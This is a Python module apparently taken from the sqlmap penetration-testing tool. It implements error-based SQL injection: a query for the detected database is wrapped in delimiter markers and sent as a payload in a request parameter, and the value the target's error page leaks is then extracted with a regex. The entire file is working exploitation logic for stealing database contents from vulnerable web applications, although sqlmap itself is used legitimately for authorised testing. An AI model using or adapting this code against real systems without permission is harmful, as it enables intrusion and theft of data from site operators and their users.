#!/usr/bin/env python
"""
$Id$
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""
import re
import time
from lib.core.agent import agent
from lib.core.common import getUnicode
from lib.core.common import randomInt
from lib.core.common import replaceNewlineTabs
from lib.core.common import safeStringFormat
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.session import setError
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
from lib.utils.resume import resume
from lib.core.settings import ERROR_SPACE
from lib.core.settings import ERROR_EMPTY_CHAR
from lib.core.settings import ERROR_START_CHAR
from lib.core.settings import ERROR_END_CHAR
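def errorUse(expression, returnPayload=False):
    """
    Retrieve the output of a SQL query taking advantage of an error SQL
    injection vulnerability on the affected parameter.

    The error query template registered for the tested DBMS
    (queries[kb.misc.testedDbms].error.query) is filled with `expression`,
    which is bracketed by ERROR_START_CHAR / ERROR_END_CHAR so that the value
    echoed back in the response page can be located with a regular
    expression.

    Args:
        expression: SQL expression whose value should be retrieved.
        returnPayload: when True, return a (output, payload) tuple instead of
            the output alone.

    Returns:
        The retrieved value with the ERROR_SPACE / ERROR_EMPTY_CHAR
        placeholders substituted, or None when the response did not contain
        a delimited value (or no page content was returned). With
        returnPayload=True a tuple (output, payload).
    """

    output = None
    logic = conf.logic
    randInt = randomInt(1)
    query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
    query = agent.postfixQuery(query)
    startLimiter = ""
    endLimiter = ""

    expressionUnescaped = expression

    if kb.dbmsDetected:
        # Only the last field of the expression is NULL-ed/casted; the other
        # values returned by getFields() are not needed here.
        _, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
        nulledCastedField = agent.nullAndCastField(fieldToCastStr)

        if kb.dbms == DBMS.MYSQL:
            # fix for that 'Subquery returns more than 1 row'
            nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))")

        expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
        expressionUnescaped = unescaper.unescape(expressionReplaced)
        startLimiter = unescaper.unescape("'%s'" % ERROR_START_CHAR)
        endLimiter = unescaper.unescape("'%s'" % ERROR_END_CHAR)
    else:
        # DBMS not fingerprinted yet: rely on the current handler's unescaping
        expressionUnescaped = kb.misc.handler.unescape(expression)
        startLimiter = kb.misc.handler.unescape("'%s'" % ERROR_START_CHAR)
        endLimiter = kb.misc.handler.unescape("'%s'" % ERROR_END_CHAR)

    forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))

    debugMsg = "query: %s" % forgedQuery
    logger.debug(debugMsg)

    payload = agent.payload(newValue=forgedQuery)
    result = Request.queryPage(payload, content=True)

    # NOTE(review): queryPage(..., content=True) is assumed to return a
    # sequence whose first element is the page body — confirm against
    # lib.request.connect. A missing/empty body simply yields no output
    # instead of raising on the regex search.
    page = result[0] if result else None

    if page:
        # The delimiters are inserted into the SQL as literal strings, so they
        # must be matched literally here as well (re.escape) rather than being
        # interpreted as pattern syntax.
        pattern = '%s(?P<result>.*?)%s' % (re.escape(ERROR_START_CHAR), re.escape(ERROR_END_CHAR))
        match = re.search(pattern, page, re.DOTALL | re.IGNORECASE)

        if match:
            output = match.group('result')

    if output:
        # Undo the placeholders the error query uses for whitespace and for
        # empty values.
        output = output.replace(ERROR_SPACE, " ").replace(ERROR_EMPTY_CHAR, "")

        if conf.verbose > 0:
            infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
            logger.info(infoMsg)

    if returnPayload:
        return output, payload
    else:
        return output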